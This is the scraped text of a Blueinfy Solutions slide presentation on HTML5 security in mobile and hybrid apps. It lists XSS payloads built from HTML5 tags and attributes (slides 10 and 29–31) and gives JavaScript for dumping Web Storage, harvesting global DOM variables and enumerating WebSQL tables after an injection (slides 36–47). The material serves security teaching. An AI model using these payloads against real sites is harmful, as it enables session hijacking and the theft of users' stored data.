Successfully reported this slideshow.

Html5 on mobile

0

Share

Loading in …3
×
1 of 50
1 of 50

More Related Content

Related Books

Free with a 14 day trial from Scribd

See all

Related Audiobooks

Free with a 14 day trial from Scribd

See all

Html5 on mobile

  1. 1. © Blueinfy Solutions HTML5 and Mobile
  2. 2. © Blueinfy Solutions What is HTML5 • Enhancement to HTML 4.01 – with more tags – API Support – Functionality to support mobile devices – More types for existing tags • Does not mean old tags will not work • Existing application can be converted by changing “<!DOCTYPE html>” in first line
  3. 3. © Blueinfy Solutions HTML5 in Mobile • It is changing the game • Apps are migrating to HTML5 and no need to use native • Web vs. Mobile – Both can use HTML5 – No need to manage several code base – HTML+CSS+JS only – Server side services
  4. 4. © Blueinfy Solutions Technology Vectors
  5. 5. © Blueinfy Solutions What is running - where??? Presentation Layer Business Layer Data Access Layer Authentication Communication etc. Runtime, Platform, Operating System Components Server side Components Client side Components (Browser) • HTML 5 • DOM • XHR • WebSocket • Storage • WebSQL • Flash • Flex • AMF • Silverlight • WCF • XAML • NET • Storage • JS • Android • iPhone/Pad • Other Mobile
  6. 6. © Blueinfy Solutions HTML5 in nutshell - Specs 6 Source: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png Source: http://html5demos.com/ Evolution going on by Web Hypertext Application Technology Working Group (WHATWG)
  7. 7. © Blueinfy Solutions Key HTML5 features for Mobile • Offline web application support • Web Storage • GeoLocation API • Canvas 2D Drawing • Video and Audio streaming support 7
  8. 8. © Blueinfy Solutions HTML5 features not supported on Mobile • Microdata • 3D animation • FileReader API • IndexDB • WebWorkers 8
  9. 9. © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In Modern Browser Model HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS/Content-Sec Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache FileSystem
  10. 10. © Blueinfy Solutions Abusing HTML 5 Tags • Various new tags and can be abused, may not be filtered or validated • Media tags <video poster=javascript:alert(document.cookie)// <audio><source onerror="javascript:alert(document.cookie)"> • Form tags <form><button formaction="javascript:alert(document.cookie)">foo <body oninput=alert(document.cookie)><input autofocus> 10
  11. 11. © Blueinfy Solutions Accessing media tags
  12. 12. © Blueinfy Solutions Moving/Touch
  13. 13. © Blueinfy Solutions Login cookie
  14. 14. © Blueinfy Solutions Profile • Fetch through storage – cookie not needed…
  15. 15. © Blueinfy Solutions WebSQL data • Through JavaScript one can store information on database. • Example 15
  16. 16. © Blueinfy Solutions One time fetch
  17. 17. © Blueinfy Solutions Network calls • HTML 5 provides WebSocket and XHR Level 2 calls • It allows to make cross domains call and raw socket capabilities • It can be leveraged by JavaScript payload • Malware or worm can use it to perform several scanning tasks 17
  18. 18. © Blueinfy Solutions Same Origin Policy (SOP) • Browser’s sandbox – Protocol, Host and Port should match – It is possible to set document.domain to parent domain if current context is child domain – Top level domain (TLD) locking down helps in sandboxing the context 18
  19. 19. © Blueinfy Solutions Fetching Location
  20. 20. © Blueinfy Solutions Location calls
  21. 21. © Blueinfy Solutions Hybrid App • Android
  22. 22. © Blueinfy Solutions Integrating native to webview • Hook your handlers to make it hybrid • Interact with webview
  23. 23. © Blueinfy Solutions Set permissions • Manifest file
  24. 24. © Blueinfy Solutions Loading Hybrid App
  25. 25. © Blueinfy Solutions Slidebar type touch views
  26. 26. © Blueinfy Solutions HTML5 Attacks
  27. 27. © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In XSS with HTML5 (tags, attributes and events) HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  28. 28. © Blueinfy Solutions HTML5 – Tags/Attributes/Events • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) • Attributes – form, submit, autofocus, sandbox, manifest, rel etc. • Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. 28
  29. 29. © Blueinfy Solutions XSS variants • Media tags • Examples – <video><source onerror="javascript:alert(1)“> – <video onerror="javascript:alert(1)"><source> 29
  30. 30. © Blueinfy Solutions XSS variants • Exploiting autofocus – <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)> 30
  31. 31. © Blueinfy Solutions XSS variants • Form & Button etc. – <form id="test" /><button form="test" formaction="javascript:alert(1)">test – <form><button formaction="javascript:alert(1)">test • Etc … and more … – Nice HTML5 XSS cheat sheet (http://html5sec.org/) 31
  32. 32. © Blueinfy Solutions • Once have an entry point – game over! Extraction through XSS
  33. 33. © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In Web Storage and DOM information extraction HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  34. 34. © Blueinfy Solutions Web Storage Extraction • Browser has one place to store data – Cookie (limited and replayed) • HTML5 – Storage API provided (Local and Session) • Can hold global scoped variables • http://www.w3.org/TR/webstorage/ 34
  35. 35. © Blueinfy Solutions Web Storage Extraction • It is possible to steal them through XSS or via JavaScript • Session hijacking – HttpOnly of no use • getItem and setItem calls • XSS the box and scan through storage
  36. 36. © Blueinfy Solutions Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } • Above code allows all storage variable extraction 36
  37. 37. © Blueinfy Solutions • HTML5 provides virtual file system with filesystem APIs – window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; • It becomes a full blown local system for application in sandbox • It empowers application File System Storage
  38. 38. © Blueinfy Solutions • It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); } • App can have full filesystem in place now. File System Storage
  39. 39. © Blueinfy Solutions • Assuming app is creating profile on local system Sensitive information filesystem
  40. 40. © Blueinfy Solutions DOM Storage • Applications run with “rich” DOM • JavaScript sets several variables and parameters while loading – GLOBALS • It has sensitive information and what if they are GLOBAL and remains during the life of application • It can be retrieved with XSS • HTTP request and response are going through JavaScripts (XHR) – what about those vars?
  41. 41. © Blueinfy Solutions Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } 41
  42. 42. © Blueinfy Solutions Global Sensitive Information Extraction from DOM • HTML5 apps running on Single DOM • Having several key global variables, objects and array – var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjf dvint","test.com"]; • Post DOM based exploitation possible and harvesting all these values. 42
  43. 43. © Blueinfy Solutions Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } 43
  44. 44. © Blueinfy Solutions SQL Injection • WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. • Allows one time data loading and offline browsing capabilities. • Causes security concern and potential injection points. • Methods and calls are possible
  45. 45. © Blueinfy Solutions SQL Injection • Through JavaScript one can harvest entire local database. • Example
  46. 46. © Blueinfy Solutions Blind WebSQL Enumeration • We need following to exploit – Database object – Table structure created on SQLite – User table on which we need to run select query 46
  47. 47. © Blueinfy Solutions Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; 47
  48. 48. © Blueinfy Solutions Blind WebSQL Enumeration • We will run through all objects and get object where constructor is “Database” • We will make Select query directly to sqlite_master database • We will grab 1st table leaving webkit table on 0th entry 48
  49. 49. © Blueinfy Solutions Blind WebSQL Enumeration 49
  50. 50. © Blueinfy Solutions Conclusion

×